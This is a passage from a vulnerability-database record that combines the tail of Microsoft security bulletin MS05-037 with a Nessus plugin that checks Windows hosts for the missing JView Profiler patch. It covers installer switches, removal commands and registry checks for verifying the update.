failure messages. Administrators should use one of the supported methods to verify the installation was successful when they use the /quiet switch. Administrators should also review the KB903235.log file for any failure messages when they use this switch.\r\n\r\nFor information about how to deploy this security update by using Software Update Services, visit the Software Update Services Web site. For information about how to deploy this security update using Windows Server Update Services, visit the Windows Server Update Services Web site. This security update will also be available through the Microsoft Update Web site.\r\n\r\nRestart Requirement\r\n\r\nThis update does not require a restart.\r\n\r\nRemoval Information\r\n\r\nTo remove this security update, use the Add or Remove Programs tool in Control Panel.\r\n\r\nSystem administrators can also use the Spuninst.exe utility to remove this security update. The Spuninst.exe utility is located in the %Windir%\$NTUninstallKB903235$\Spuninst folder.\r\nSupported Spuninst.exe Switches\r\nSwitch\tDescription\r\n\r\n/help\r\n\t\r\n\r\nDisplays the command-line options\r\nSetup Modes\t \r\n\r\n/passive\r\n\t\r\n\r\nUnattended Setup mode. No user interaction is required, but installation status is displayed. If a restart is required at the end of Setup, a dialog box will be presented to the user with a timer warning that the computer will restart in 30 seconds.\r\n\r\n/quiet\r\n\t\r\n\r\nQuiet mode. This is the same as unattended mode, but no status or error messages are displayed.\r\nRestart Options\t \r\n\r\n/norestart\r\n\t\r\n\r\nDoes not restart when installation has completed\r\n\r\n/forcerestart\r\n\t\r\n\r\nRestarts the computer after installation and force other applications to close at shutdown without saving open files first.\r\n\r\n/warnrestart[:x]\r\n\t\r\n\r\nPresents a dialog box with a timer warning the user that the computer will restart in x seconds. (The default setting is 30 seconds.) Intended for use with the /quiet switch or the /passive switch.\r\n\r\n/promptrestart\r\n\t\r\n\r\nDisplay a dialog box prompting the local user to allow a restart\r\nSpecial Options\t \r\n\r\n/forceappsclose\r\n\t\r\n\r\nForces other programs to close when the computer shuts down\r\n\r\n/log:path\r\n\t\r\n\r\nAllows the redirection of installation log files\r\n\r\nVerifying that the Update Has Been Applied\r\n\u2022\t\r\n\r\nMicrosoft Baseline Security Analyzer\r\n\r\nTo verify that a security update has been applied to an affected system, you may be able to use the Microsoft Baseline Security Analyzer (MBSA) tool. MBSA allows administrators to scan local and remote systems for missing security updates and for common security misconfigurations. For more information about MBSA, visit the Microsoft Baseline Security Analyzer Web site.\r\n\u2022\t\r\n\r\nRegistry Key Verification\r\n\r\nYou may also be able to verify the files that this security update has installed by reviewing the following registry keys.\r\n\r\nFor Windows XP Home Edition Service Pack 2, Windows XP Professional Service Pack 2, Windows XP Tablet PC Edition 2005, and Windows XP Media Center Edition 2005:\r\n\r\nHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{03D9F3F2-B0E3-11D2-B081-006008039BF0}\r\nTop of sectionTop of section\r\n\t\r\nInternet Explorer 6 Service Pack 1 for Windows XP Service Pack 1 and Windows 2000 Service Pack 4\r\n\r\nPrerequisites\r\nTo install the Internet Explorer 6 Service Pack 1 (SP1) version of this update, you must be running Internet Explorer 6 SP1 (version 6.00.2800.1106) on one of the following versions of Windows:\r\n\u2022\t\r\n\r\nMicrosoft Windows 2000 Service Pack 4\r\n\u2022\t\r\n\r\nMicrosoft Small Business Server 2000 Service Pack 1a (SP1a) or Small Business Server 2000 running with Windows 2000 Server Service Pack 4 (SP4)\r\n\u2022\t\r\n\r\nMicrosoft Windows XP Service Pack 1\r\n\r\nThe software that is listed has been tested to determine whether the versions are affected. Other versions either no longer include security update support or may not be affected. To determine the support life cycle for your product and version, visit the Microsoft Support Lifecycle Web site.\r\n\r\nFor more information about how to obtain the latest service pack, see Microsoft Knowledge Base Article 260910.\r\n\r\nInclusion in Future Service Packs:\r\nThe update for this issue may be included in a future Update Rollup.\r\n\r\nInstallation Information\r\n\r\nThis update uses the IExpress installer technology. For more information on IExpress, please see Microsoft Knowledge Base Article 197147.\r\n\r\nThis security update supports the following setup switches.\r\nSupported Security Update Installation Switches\r\nSwitch\tDescription\r\nSetup Modes\t \r\n\r\n/q\r\n\t\r\n\r\nSpecifies quiet mode, or suppresses prompts, when files are being extracted.\r\n\r\n/q:u\r\n\t\r\n\r\nSpecifies user-quiet mode, which presents some dialog boxes to the user.\r\n\r\n/q:a\r\n\t\r\n\r\nSpecifies administrator-quiet mode, which does not present any dialog boxes to the user.\r\nRestart Options\t \r\n\r\n/r:n\r\n\t\r\n\r\nNever restarts the computer after installation.\r\n\r\n/r:i\r\n\t\r\n\r\nPrompts the user to restart the computer if a restart is required, except when used with /q:a.\r\n\r\n/r:a\r\n\t\r\n\r\nAlways restarts the computer after installation.\r\n\r\n/r:s\r\n\t\r\n\r\nRestarts the computer after installation without prompting the user.\r\nSpecial Options\t \r\n\r\n/t:<full path>\r\n\t\r\n\r\nSpecifies the target folder for extracting files.\r\n\r\n/c\r\n\t\r\n\r\nExtracts the files without installing them. If /T: path is not specified, user will be prompted for a target folder.\r\n\r\n/c:<Cmd>\r\n\t\r\n\r\nOverride Install Command defined by author. Specifies the path and name of the Setup .inf or .exe file.\r\n\r\nNote These switches do not necessarily work with all updates. If a switch is not available, then that functionality is necessary for the correct installation of the update. Also, the use of the /N:V switch is unsupported and may result in an unbootable system. If the installation is unsuccessful, you should consult your support professional to understand why it failed to install.\r\n\r\nFor additional information about the supported setup switches, see Microsoft Knowledge Base Article 197147.\r\n\r\nDeployment Information\r\n\r\nTo install the security update without any user intervention, use the following command at a command prompt for Windows XP Service Pack 1:\r\n\r\nIE-KB903235-x86-ENU.exe /q:a\r\n\r\nFor information about how to deploy this security update by using Software Update Services, visit the Software Update Services Web site. For information about how to deploy this security update using Windows Server Update Services, visit the Windows Server Update Services Web site. This security update will also be available through the Microsoft Update Web site.\r\n\r\nRestart Requirement\r\n\r\nThis update does not require a restart.\r\n\r\nRemoval Information\r\n\r\nTo remove this security update, use the Add or Remove Programs tool in Control Panel.\r\n\r\nSystem administrators can use the Ieuninst.exe utility to remove this update. This security update installs the Ieuninst.exe utility in the %Windir% folder. This utility supports the following setup switches:\r\nSupported Ieuninst.exe Switches\r\nSwitch\tDescription\r\n\r\n/?\r\n\t\r\n\r\nDisplays the command-line options\r\nSetup Modes\t \r\n\r\n/q\r\n\t\r\n\r\nQuiet mode. No user interaction is required.\r\nRestart Options\t \r\n\r\n/z\r\n\t\r\n\r\nDoes not restart when installation is complete.\r\n\r\nFor example, to remove this update quietly, use the following command:\r\n\r\nc:\windows\ieuninst /q c:\windows\inf\q903235.inf\r\n\r\nNote This command assumes that Windows is installed in the C:\Windows folder.\r\n\r\nVerifying that the Update Has Been Applied\r\n\u2022\t\r\n\r\nMicrosoft Baseline Security Analyzer\r\n\r\nTo verify that a security update has been applied to an affected system, you may be able to use the Microsoft Baseline Security Analyzer (MBSA) tool. MBSA allows administrators to scan local and remote systems for missing security updates and for common security misconfigurations. For more information about MBSA, visit the Microsoft Baseline Security Analyzer Web site.\r\n\u2022\t\r\n\r\nRegistry Key Verification\r\n\r\nYou may also be able to verify the files that this security update has installed by reviewing the following registry key.\r\n\r\nFor Windows XP Home Edition Service Pack 1, Windows XP Professional Service Pack 1, Windows XP Tablet PC Edition, Windows XP Media Center Edition, Windows 2000 Service Pack 4 and Small Business Server 2000:\r\n\r\nHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{03D9F3F2-B0E3-11D2-B081-006008039BF0}\r\nTop of sectionTop of section\r\n\t\r\nInternet Explorer 5.01 for Windows 2000 Service Pack 4\r\n\r\nPrerequisites\r\nTo install the Internet Explorer 5.01 version of this update, you must be running Internet Explorer 5.01 Service Pack 4 (version 5.00.3700.1000) on Windows 2000 Service Pack 4 (SP4).\r\n\r\nFor Small Business Server 2000, this security update requires Small Business Server 2000 Service Pack 1a (SP1a) or Small Business Server 2000 running with Windows 2000 Server Service Pack 4 (SP4).\r\n\r\nNote Versions of Windows and versions of Internet Explorer that are not listed in this article are no longer supported. Although you can install some of the update packages that are described in this article on these unlisted versions of Windows and of Internet Explorer, Microsoft has not tested them to assess whether they are affected by these vulnerabilities. Microsoft has also not tested these versions to confirm that the update that this bulletin describes addresses these vulnerabilities. We recommend that you upgrade to a supported version of Windows and of Internet Explorer, and then install the appropriate update.\r\n\r\nThe software that is listed has been tested to determine whether the versions are affected. Other versions either no longer include security update support or may not be affected. To determine the support life cycle for your product and version, visit the Microsoft Support Lifecycle Web site.\r\n\r\nFor more information about how to obtain the latest service pack, see Microsoft Knowledge Base Article 260910.\r\n\r\nInclusion in Future Service Packs:\r\nThe update for this issue may be included in a future Update Rollup.\r\n\r\nInstallation Information\r\n\r\nThis update uses the IExpress installer technology. For more information on IExpress, please see Microsoft Knowledge Base Article 197147.\r\n\r\nThis security update supports the following setup switches.\r\nSupported Security Update Installation Switches\r\nSwitch\tDescription\r\nSetup Modes\t \r\n\r\n/q\r\n\t\r\n\r\nSpecifies quiet mode, or suppresses prompts, when files are being extracted.\r\n\r\n/q:u\r\n\t\r\n\r\nSpecifies user-quiet mode, which presents some dialog boxes to the user.\r\n\r\n/q:a\r\n\t\r\n\r\nSpecifies administrator-quiet mode, which does not present any dialog boxes to the user.\r\nRestart Options\t \r\n\r\n/r:n\r\n\t\r\n\r\nNever restarts the computer after installation.\r\n\r\n/r:i\r\n\t\r\n\r\nPrompts the user to restart the computer if a restart is required, except when used with /q:a.\r\n\r\n/r:a\r\n\t\r\n\r\nAlways restarts the computer after installation.\r\n\r\n/r:s\r\n\t\r\n\r\nRestarts the computer after installation without prompting the user.\r\nSpecial Options\t \r\n\r\n/t:<full path>\r\n\t\r\n\r\nSpecifies the target folder for extracting files.\r\n\r\n/c\r\n\t\r\n\r\nExtracts the files without installing them. If /T: path is not specified, user will be prompted for a target folder.\r\n\r\n/c:<Cmd>\r\n\t\r\n\r\nOverride Install Command defined by author. Specifies the path and name of the Setup .inf or .exe file.\r\n\r\nNote These switches do not necessarily work with all updates. If a switch is not available, then that functionality is necessary for the correct installation of the update. Also, the use of the /N:V switch is unsupported and may result in an unbootable system. If the installation is unsuccessful, you should consult your support professional to understand why it failed to install.\r\n\r\nFor additional information about the supported setup switches, see Microsoft Knowledge Base Article 197147.\r\n\r\nDeployment Information\r\n\r\nTo install the security update without any user intervention, use the following command at a command prompt for Windows 2000 Service Pack 4:\r\n\r\nIE-KB903235-x86-ENU.exe /q:a\r\n\r\nFor information about how to deploy this security update by using Software Update Services, visit the Software Update Services Web site. For information about how to deploy this security update using Windows Server Update Services, visit the Windows Server Update Services Web site. This security update will also be available through the Microsoft Update Web site.\r\n\r\nRestart Requirement\r\n\r\nThis update does not require a restart.\r\n\r\nRemoval Information\r\n\r\nTo remove this security update, use the Add or Remove Programs tool in Control Panel.\r\n\r\nSystem administrators can use the Ieuninst.exe utility to remove this update. This security update installs the Ieuninst.exe utility in the %Windir% folder. This utility supports the following setup switches:\r\nSupported Ieuninst.exe Switches\r\nSwitch\tDescription\r\n\r\n/?\r\n\t\r\n\r\nDisplays the command-line options\r\nSetup Modes\t \r\n\r\n/q\r\n\t\r\n\r\nQuiet mode. No user interaction is required.\r\nRestart Options\t \r\n\r\n/z\r\n\t\r\n\r\nDoes not restart when installation is complete.\r\n\r\nFor example, to remove this update quietly, use the following command:\r\n\r\nc:\windows\ieuninst /q c:\windows\inf\q903235.inf\r\n\r\nNote This command assumes that Windows is installed in the C:\Windows folder.\r\n\r\nVerifying that the Update Has Been Applied\r\n\u2022\t\r\n\r\nMicrosoft Baseline Security Analyzer\r\n\r\nTo verify that a security update has been applied to an affected system, you may be able to use the Microsoft Baseline Security Analyzer (MBSA) tool. MBSA allows administrators to scan local and remote systems for missing security updates and for common security misconfigurations. For more information about MBSA, visit the Microsoft Baseline Security Analyzer Web site.\r\n\u2022\t\r\n\r\nRegistry Key Verification\r\n\r\nYou may also be able to verify the files that this security update has installed by reviewing the following registry keys:\r\n\r\nHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{03D9F3F2-B0E3-11D2-B081-006008039BF0}\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\r\nObtaining Other Security Updates:\r\n\r\nUpdates for other security issues are available at the following locations:\r\n\u2022\t\r\n\r\nSecurity updates are available in the Microsoft Download Center. You can find them most easily by doing a keyword search for "security_patch."\r\n\u2022\t\r\n\r\nUpdates for consumer platforms are available at the Windows Update Web site.\r\n\r\nSupport:\r\n\u2022\t\r\n\r\nCustomers in the U.S. and Canada can receive technical support from Microsoft Product Support Services at 1-866-PCSAFETY. There is no charge for support calls that are associated with security updates.\r\n\u2022\t\r\n\r\nInternational customers can receive support from their local Microsoft subsidiaries. There is no charge for support that is associated with security updates. For more information about how to contact Microsoft for support issues, visit the International Support Web site.\r\n\r\nSecurity Resources:\r\n\u2022\t\r\n\r\nThe Microsoft TechNet Security Web site provides additional information about security in Microsoft products.\r\n\u2022\t\r\n\r\nMicrosoft Software Update Services\r\n\u2022\t\r\n\r\nMicrosoft Baseline Security Analyzer (MBSA)\r\n\u2022\t\r\n\r\nWindows Update\r\n\u2022\t\r\n\r\nMicrosoft Update\r\n\u2022\t\r\n\r\nWindows Update Catalog: For more information about the Windows Update Catalog, see Microsoft Knowledge Base Article 323166.\r\n\u2022\t\r\n\r\nOffice Update \r\n\r\nSoftware Update Services:\r\n\r\nBy using Microsoft Software Update Services (SUS), administrators can quickly and reliably deploy the latest critical updates and security updates to Windows 2000 and Windows Server 2003-based servers, and to desktop systems that are running Windows 2000 Professional or Windows XP Professional.\r\n\r\nFor more information about how to deploy this security update by using Software Update Services, visit the Software Update Services Web site.\r\n\r\nWindows Server Update Services:\r\n\r\nBy using Windows Server Update Services (WSUS), administrators can quickly and reliably deploy the latest critical updates and security updates for Windows 2000 operating systems and later, Office XP and later, Exchange Server 2003, and SQL Server 2000 to Windows 2000 and later operating systems.\r\n\r\nFor more information about how to deploy this security update using Windows Server Update Services, visit the Windows Server Update Services Web site.\r\n\r\nSystems Management Server:\r\n\r\nMicrosoft Systems Management Server (SMS) delivers a highly-configurable enterprise solution for managing updates. By using SMS, administrators can identify Windows-based systems that require security updates and can perform controlled deployment of these updates throughout the enterprise with minimal disruption to end users. For more information about how administrators can use SMS 2003 to deploy security updates, visit the SMS 2003 Security Patch Management Web site. SMS 2.0 users can also use Software Updates Service Feature Pack to help deploy security updates. For information about SMS, visit the SMS Web site.\r\n\r\nNote SMS uses the Microsoft Baseline Security Analyzer, the Microsoft Office Detection Tool, and the Enterprise Update Scanning Tool to provide broad support for security bulletin update detection and deployment. Some software updates may not be detected by these tools. Administrators can use the inventory capabilities of the SMS in these cases to target updates to specific systems. For more information about this procedure, visit the following Web site. Some security updates require administrative rights following a restart of the system. Administrators can use the Elevated Rights Deployment Tool (available in the SMS 2003 Administration Feature Pack and in the SMS 2.0 Administration Feature Pack) to install these updates.\r\n\r\nDisclaimer:\r\n\r\nThe information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nRevisions: \r\n\u2022\t\r\n\r\nV1.0 (July 12, 2005): Bulletin published", "edition": 1, "modified": "2005-07-12T00:00:00", "published": "2005-07-12T00:00:00", "id": "SECURITYVULNS:DOC:9144", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:9144", "title": "Microsoft Security Bulletin MS05-037 Vulnerability in JView Profiler Could Allow Remote Code Execution (903235)", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-03-01T06:18:14", "description": "The remote host contains a version of the JView Profiler module that\nis vulnerable to a security flaw that may allow an attacker to execute\narbitrary code on the remote host by constructing a malicious web page\nand enticing a victim to visit this web page.", "edition": 27, "published": "2005-07-12T00:00:00", "title": "MS05-037: Vulnerability in JView Profiler Could Allow Code Execution (903235)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-2087"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS05-037.NASL", "href": "https://www.tenable.com/plugins/nessus/18682", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(18682);\n script_version(\"1.35\");\n script_cvs_date(\"Date: 2018/11/15 20:50:29\");\n\n script_cve_id(\"CVE-2005-2087\");\n script_bugtraq_id(14087);\n script_xref(name:\"MSFT\", value:\"MS05-037\");\n script_xref(name:\"CERT\", value:\"939605\");\n script_xref(name:\"EDB-ID\", value:\"1079\");\n script_xref(name:\"MSKB\", value:\"903235\");\n\n script_name(english:\"MS05-037: Vulnerability in JView Profiler Could Allow Code Execution (903235)\");\n script_summary(english:\"Determines the presence of update 903235\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitrary code can be executed on the remote host through the web\nclient.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains a version of the JView Profiler module that\nis vulnerable to a security flaw that may allow an attacker to execute\narbitrary code on the remote host by constructing a malicious web page\nand enticing a victim to visit this web page.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2005/ms05-037\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows 2000, XP and\n2003.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/06/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/07/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_dependencies(\"smb_hotfixes.nasl\",\"smb_nt_ms05-038.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n exit(0);\n}\n\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS05-037';\nkb = '903235';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\n\nif ( hotfix_check_sp(xp:3, win2003:2, win2k:6) <= 0 ) exit(0);\n\n\nif ( hotfix_ie_gt(7) != 0 ) exit(0);\nif ( hotfix_missing(name:\"896727\") <= 0 ) exit(0);\nif ( hotfix_missing(name:\"896688\") <= 0 ) exit(0);\nif ( hotfix_missing(name:\"905915\") <= 0 ) exit(0);\nif ( hotfix_missing(name:\"903235\") > 0 )\n{\n if (get_kb_item (\"SMB/Registry/HKLM/SOFTWARE/Microsoft/Internet Explorer/ActiveX Compatibility/{03D9F3F2-B0E3-11D2-B081-006008039BF0}\"))\n exit (0);\n\n minorversion = get_kb_item(\"SMB/Registry/HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Internet Settings/MinorVersion\");\n if ( \"903235\" >!< minorversion ) {\n set_kb_item(name:\"SMB/Missing/MS05-037\", value:TRUE);\n hotfix_add_report(bulletin:bulletin, kb:kb);\n hotfix_security_hole();\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}
